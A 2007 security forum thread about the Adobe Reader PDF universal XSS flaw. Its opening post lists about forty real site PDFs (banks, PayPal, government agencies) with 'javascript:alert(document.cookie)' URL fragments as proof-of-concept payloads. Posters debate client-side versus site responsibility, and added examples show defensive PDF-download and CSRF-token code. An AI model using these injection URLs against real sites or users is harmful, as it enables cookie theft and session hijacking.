Sla.ckers.org
UXSS is MAJOR
Posted by: eyeced
Date: January 04, 2007 05:50PM

I almost overlooked the 'Myspace XSS' post in here the other day, until I read up some more on the 23c3 conference, as well as being bombarded with information through the mailing lists entitled UXSS. Anyway I just thought I'd share the fact that at the time of this post, websites hosting PDF files are vulnerable to JavaScript injection, which could lead to a lot of 'crazy shit', to cut the story short. This can be exploited by simply putting url.com/asdf.pdf#anything=javascript:alert('cookeH').

To show you the gravity of this situation I have included *just a few* of the biggest websites on the internet in the exploitable state. (This is merely for educational purposes as ever).

www.microsoft.com/windows2000/docs/TCO.pdf#blah=javascript:alert('cookeh')
http://docs.yahoo.com/docs/pr/pdf/1q05pr.pdf#fdf=javascript:alert(document.cookie)
http://pages.ebay.co.uk/businesscentre/BC_Guide.pdf#fdf=javascript:alert('hi')
https://www.paypal.com/en_US/pdf/PP_WebsitePaymentsStandard_IntegrationGuide.pdf#fdf=javascript:alert(document.cookie)
http://direct.motorola.com/ENS/pdfs/email-setup-hotmail.pdf#fdf=javascript:alert(document.cookie)
www.ofcom.org.uk/tv/obb/adv_comp/ab_17/a17.pdf#fdf=javascript:alert(document.cookie)
www.usembassy.org.uk/cons_new/visa/forms/e03.pdf#fdf=javascript:alert(document.cookie)
www.bankofengland.co.uk/publications/financialsanctions/sanctions060811.pdf#fdf=javascript:alert(document.cookie)
www.hm-treasury.gov.uk/media/A5F/A7/lettertogovofbofepbr03.pdf#fdf=javascript:alert(document.cookie)
www.halifax.ca/legislation/bylaws/hrm/blp-800.pdf#fdf=javascript:alert(document.cookie)
www.mcafee.com/us/local_content/case_studies/cs_halifax.pdf#fdf=javascript:alert(document.cookie)
www.barclays.co.uk/business/importantinfo/ats_june05.pdf#fdf=javascript:alert('secure online banking - u srs?')
www.lloydstsb.com/media/lloydstsb2004/pdfs/LTSBI_homeguide1.pdf#fdf=javascript:alert('secure online banking - u srs?')
http://www.natwest.com/microsites/private/site/pdf/Introduction_NatWest_Private_Banking.pdf#fdf=javascript:alert('eh')
http://www.nasa.gov/pdf/1968main_strategi.pdf#fdf=javascript:alert('eh')
www.citibank.com.au/global_docs/pdf/Citibank_Retirement_Index.pdf#fdf=javascript:alert('eh')
www.halifax.co.uk/filestore/HSB%20handbook%20May%202005%20pdf.pdf#fdf=javascript:alert('eh')
www.fbi.gov/pressrel/pressrel01/mail3.pdf#fdf=javascript:alert('eh')
https://www.bt.com/customerservices/downloads/malicious_calls.pdf#fdf=javascript:alert('eh')
members.aol.com/dswart/ElectricFruits.pdf#fdf=javascript:alert('eh')
www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#fdf=javascript:alert('eh')
www.apple.com/server/pdfs/UnderstandingUsingNetInfo.pdf#fdf=javascript:alert('eh')
http://www.morrisons.co.uk/AnnualReport06.pdf#fdf=javascript:alert('eh')
www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf#fdf=javascript:alert('eh')
www.skype.com/security/files/2005-031%20security%20evaluation.pdf#fdf=javascript:alert('eh')
www.sun.com/blueprints/0100/security.pdf#fdf=javascript:alert('eh')
http://www.adobe.com/products/pdfs/intelmacsupport.pdf#fdf=javascript:alert('eh')
http://images.amazon.com/media/i3d/01/golddisk.pdf#fdf=javascript:alert('eh')
http://www.php.net/~wez/extending-php.pdf#fdf=javascript:alert('eh')
http://upload.wikimedia.org/wikipedia/en/2/20/Davis_recall_petition.pdf#fdf=javascript:alert('eh')
http://assets.xbox.com/en-us/HardwareManuals/Controller_S.pdf#fdf=javascript:alert('badnewz is a badkid')
http://www.bungie.net/images/games/halo2/support/halo2manual_EN.pdf#fdf=javascript:alert('no srsly')
www.gfi.com/whitepapers/network-protection-against-email-threats.pdf#fdf=javascript:alert('eh')
www.leeds.ac.uk/iss/email/students/tut92.pdf#fdf=javascript:alert('eh')
http://msnbcmedia.msn.com/i/msnbc/sections/TVNews/Today%20show/PDF/OrganicPregnancy.pdf#fdf=javascript:alert('eh')
www.telewest.co.uk/pdfs/Tariff_Res_170403.pdf#fdf=javascript:alert('eh')
http://www.dell.com/downloads/global/corporate/environ/2006_sustainability_report.pdf#fdf=javascript:alert('eh')
http://communications.bestbuy.com/pressroom/includes/Releases/GeekSquadRelease.pdf#fdf=javascript:alert('eh')
http://ir.fedex.com/downloads/code.pdf#fdf=javascript:alert('eh')
http://www.whitehatsec.com/presentations/phishing_superbait.pdf#fdf=javascript:alert('eh')

The last one is the most ironic XSS URL I have ever seen!

Well, I think you'll agree from the links above, this is seriously a major threat.

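Since the thread's own conclusion is that the hosting site cannot filter the `#...=javascript:` part (the fragment never leaves the browser), the only server-side lever is how the PDF is served. Below is an added example, not code from the thread or from any of the sites listed: a small WSGI handler that serves PDFs with `Content-Disposition: attachment`, so the browser downloads the file instead of rendering it in-page through the Reader plugin in the hosting site's origin. The file names and the placeholder PDF bytes are constructed for the demo; `serve()` is split out from the WSGI glue so it can be exercised without a network.

```python
"""Added example (not from the sla.ckers.org thread): serve PDFs as
downloads rather than letting the browser render them inline.

Forcing a download is a widely used server-side hardening step for this
class of issue. Note the limit of what the server can see: the part of
the URL after '#' is never sent in the HTTP request, so there is nothing
in the request to inspect or block; only the response headers are under
the site's control.
"""
import posixpath
from wsgiref.simple_server import make_server

# Constructed in-memory "document root" so the example runs offline.
# In a real deployment these would be files on disk.
FAKE_FILES = {
    "/guide.pdf": b"%PDF-1.4\n% constructed placeholder, not a real document\n%%EOF\n",
    "/index.html": b"<html><body>docs</body></html>",
}


def safe_path(request_path):
    """Normalise the request path; a leading '/' makes normpath collapse
    any '..' segments so the lookup cannot escape the document root."""
    return posixpath.normpath("/" + request_path.lstrip("/"))


def response_headers_for(path):
    """Return (content_type, extra_headers) for a served file.

    PDFs get an attachment disposition plus nosniff, so the browser
    neither renders them in-page nor reinterprets the body as HTML.
    """
    if path.lower().endswith(".pdf"):
        # Strip quotes so the file name cannot break out of the header value.
        name = posixpath.basename(path).replace('"', "")
        return "application/pdf", [
            ("Content-Disposition", 'attachment; filename="%s"' % name),
            ("X-Content-Type-Options", "nosniff"),
        ]
    return "text/html; charset=utf-8", [("X-Content-Type-Options", "nosniff")]


def serve(request_path, files=FAKE_FILES):
    """Core request logic, kept separate from WSGI so it is testable.

    Returns (status, headers, body).
    """
    path = safe_path(request_path)
    if path not in files:
        return "404 Not Found", [("Content-Type", "text/plain")], b"not found"
    ctype, extra = response_headers_for(path)
    body = files[path]
    headers = [("Content-Type", ctype), ("Content-Length", str(len(body)))] + extra
    return "200 OK", headers, body


def app(environ, start_response):
    """Minimal WSGI adapter around serve()."""
    status, headers, body = serve(environ.get("PATH_INFO", "/"))
    start_response(status, headers)
    return [body]


if __name__ == "__main__":
    # Run locally and fetch http://127.0.0.1:8000/guide.pdf to see the
    # download headers (assumed port; change as needed).
    make_server("127.0.0.1", 8000, app).serve_forever()
```

The attachment header changes where the document is opened, not what it contains, so a user who saves the file and opens it in a standalone reader is still relying on a patched client; the point of the header is that the site's own origin is no longer the one in which the plugin runs.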
Re: UXSS is MAJOR
Posted by: zeno
Date: January 04, 2007 06:42PM

Listing websites hosting PDF files is retarded. There is no site vuln here; this is a client issue, please move along.

- zeno
http://www.cgisecurity.com/

Re: UXSS is MAJOR
Posted by: rsnake
Date: January 04, 2007 07:05PM

Hahah... a little harsh there, eh, Zeno? I think what he's demonstrating is how dangerous the issue is. Not specifically outing those companies. Anyway, your point is right though, it's a client issue. Practically every website is vulnerable at this point because the clients need to be fixed.

- RSnake
Gotta love it. http://ha.ckers.org

Re: UXSS is MAJOR
Posted by: jungsonn
Date: January 05, 2007 01:14AM

Try to find some PDFs on my server ^^ That anchor (#) issue is going to haunt me for a looooooong time. *sigh*

Re: UXSS is MAJOR
Posted by: eyeced
Date: January 05, 2007 10:31AM

http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf#zeno=javascript:alert('sorry%20chief')

Just one more for you, zeno!

I appreciate the fact that it is not an individual site vulnerability; I was merely highlighting some of the major sites that are vulnerable. (Or not, depending on how you look at it).

Edited 1 time(s). Last edit at 01/06/2007 08:26AM by eyeced.

Re: UXSS is MAJOR
Posted by: Anonymous User
Date: January 05, 2007 11:22AM

nice one, eyeced! ;)
Edited 1 time(s). Last edit at 01/05/2007 11:23AM by .mario.

Re: UXSS is MAJOR
Posted by: jungsonn
Date: January 05, 2007 08:20PM

It surely would beat the 'soitbegins' thread if you poke Google with pdf dorks.

Re: UXSS is MAJOR
Posted by: kirke
Date: January 06, 2007 04:25PM

zeno, you're 101% right from the view of a developer, but you totally ignore one of the most important things here:
UXSS (using the thread's title) opens attacks for session riding/CSRF (aka web trojans etc.) in each and every application on each and every site (.anything.tld) where at least one .pdf is available. Your application is vulnerable then, even if the whole site is XSS-safe.
Conclusion: either make your applications safe against session attacks (session hijacking/fixation/riding, CSRF, whatever), or simply remove each and every .pdf from the whole site.
Do you think that this is worth being 101% right?

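kirke's first option, making the application itself safe against session riding, usually means a per-session anti-CSRF token on every state-changing request. The following is an added example, not code from the thread or from any project named in it, showing that check: a token issued into the server-side session and required, in constant-time comparison, on any method that is not GET/HEAD/OPTIONS. The session dict, the `csrf_token` field name and the `X-CSRF-Token` header name are assumptions for the demo.

```python
"""Added example (not from the sla.ckers.org thread): per-session CSRF
tokens enforced on state-changing requests.

Assumptions: the framework gives us a mutable per-user session mapping,
form fields as a dict, and request headers as a dict. The field and
header names below are invented for the demo.
"""
import hmac
import secrets

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}   # must never change state
TOKEN_FIELD = "csrf_token"                  # assumed form field name
TOKEN_HEADER = "X-CSRF-Token"               # assumed header for XHR callers


def issue_token(session):
    """Create the session's secret token on first use and return it.

    The token is stored server-side in the session, not in a cookie the
    browser would attach automatically; the page embeds it in forms.
    """
    if "_csrf" not in session:
        session["_csrf"] = secrets.token_urlsafe(32)
    return session["_csrf"]


def is_request_allowed(session, method, form, headers):
    """Decide whether a request may proceed.

    Safe methods pass through. Any other method must present the
    session's token, either as a form field or as a header. Comparison
    is constant-time so the check does not leak the token byte by byte.
    """
    if method.upper() in SAFE_METHODS:
        return True
    expected = session.get("_csrf")
    if not expected:
        # No token was ever issued to this session: nothing to match,
        # so a forged request cannot be distinguished from a real one.
        return False
    supplied = form.get(TOKEN_FIELD) or headers.get(TOKEN_HEADER) or ""
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_transfer(session, method, form, headers):
    """Example state-changing endpoint: only acts when the check passes.

    Returns a short status string so the outcome is observable.
    """
    if not is_request_allowed(session, method, form, headers):
        return "rejected: missing or invalid CSRF token"
    return "ok: transfer of %s processed" % form.get("amount", "0")


if __name__ == "__main__":
    # Constructed walk-through of one session and three requests.
    sess = {}
    token = issue_token(sess)
    print(handle_transfer(sess, "POST", {"amount": "10", TOKEN_FIELD: token}, {}))
    print(handle_transfer(sess, "POST", {"amount": "10"}, {}))
    print(handle_transfer(sess, "GET", {}, {}))
```

The token defeats the classic ride, where a form or script on some other origin submits a request that only carries the victim's cookies. It is worth being precise about what it does not cover, since that is the crux of the thread: script that already executes inside the site's own origin, which is what the PDF issue gives an attacker, can read the token out of the page like any other same-origin content. The token is therefore the floor kirke is asking for, and it needs to be combined with serving PDFs as downloads or removing them, and with patched clients, rather than substituted for those.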